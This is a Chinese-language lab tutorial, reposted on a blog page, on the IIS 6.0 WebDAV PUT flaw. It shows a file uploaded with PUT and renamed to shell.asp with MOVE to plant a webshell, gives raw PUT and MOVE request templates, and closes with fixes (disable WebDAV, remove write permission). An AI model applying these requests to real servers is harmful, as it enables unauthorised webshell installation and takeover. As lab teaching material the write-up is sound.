[WEB安全]IIS-PUT漏洞

0x00 IIS简介

IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。
最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003一起发行,但在Windows XP Home版本上并没有IIS。
IIS是一种Web(网页)服务组件,其中包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器.
分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)上发布信息成了一件很容易的事。

0x01 Put漏洞造成原因

IIS Server在Web服务扩展中开启了WebDAV,配置了可以写入的权限,造成任意文件上传。

0x02 实验环境搭建

1:安装VMware
2:安装WIN2003
3:配置网络连接
4:安装IIS6.0(64bit)

VMware虚拟机选择的网络是.NET模式,或者桥接模式也可以!但前提必须让2003和物理机相互Ping通才可以!

有时候互相Ping不通可能是防火墙的原因,可以把防火墙关闭就可以Ping通了

在这里我的物理机IP:192.168.1.100
WIN2003虚拟机的IP:192.168.119.133

1561366-20190803164846037-1374581144.png

然后配置完IIS后我们用物理机访问WIN2003的IP看看能不能打开网页:

访问:http://192.168.119.133/

1561366-20190803164853769-270702603.png
上面说明是可以访问到网站的。(一切就绪)

0x03 需要用到的工具

这里不借助这个工具也是可行的,熟悉了这些请求方式的格式之后,就可以通过burp抓包,改数据也行。
当然也可以利用这个工具:IIS写权限的利用 - 桂林老兵:https://www.arpun.com/soft/13406.html

(PS:不建议下载到本机吼~)

1561366-20190803164933798-90714203.png

0x04 IIS-PUT漏洞演示实战

首先来到Internet信息服务(IIS)管理器 - Web服务扩展:
我们把WebDAV设置为允许、然后网站主目录下设置可写入权限:
1561366-20190803164947311-1886436169.png

1561366-20190803164951736-744764761.png

这个时候就有可能照成任意文件上传,我们来先来发送一个OPTIONS请求:
options 请求属于浏览器的预检请求,查看服务器是否接受请求,预检通过后,浏览器才会去发 get, post, put, delete 等请求。

1561366-20190803165001576-753833098.png

可以看到服务器可以使用PUT、DELETE、MOVE等敏感请求方式,那么我们来试试用PUT写一个文件:
1561366-20190803165009118-937597876.png

1561366-20190803165015032-664469675.png

发现成功上传了txt文件。(这里如果无法上传的话,有可能是多重原因,网站目录权限不够或者没有在文件名前面加上/)
那我们再上传脚本文件asp试试:

1561366-20190803165023575-1607369065.png

这个时候就不行了,但是我们可以通过MOVE请求方式,并利用刚刚上传上去的test.txt文件做些改动:

1561366-20190803165034127-1693788068.png

这里就可以看到,我们通过先前上传的test.txt,借助MOVE给他更改了后缀名,那看看里面的内容有没有发生变化:

1561366-20190803165041449-1011214774.png

文件内容并没有发生任何变化,这里的MOVE协议是不可以更改文件内容的。
总结一下,只要能够上传恶意的txt文件,同时借助MOVE请求方式就可以生成恶意连接后门。
从新上传一个恶意txt,尝试连接菜刀,完全没问题的。

1561366-20190803165108788-1852649240.png

0x05 常见请求协议

GET:

GET /test.txt HTTP/1.1
Referer: http://192.168.101.100
Host: 192.168.101.100
Cookie: iscookies=0;

DELETE:

DELETE /test.txt HTTP/1.1
Host: 192.168.101.100

PUT:

PUT /test.txt HTTP/1.1
Host: 192.168.101.100
Content-Length: 17

this is a test

POST:

POST /test.txt HTTP/1.1
Referer: http://192.168.101.100
Host: 192.168.101.100
Content-Length: 5
Cookie: iscookies=0;

this is a test

MOVE:

MOVE /test.txt HTTP/1.1
Host: 192.168.101.100
Destination: http://192.168.101.100/shell.asp

0x06 漏洞修复建议

1:关闭WebDAV
2:关闭写入权限

转载于:https://www.cnblogs.com/-mo-/p/11295400.html

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值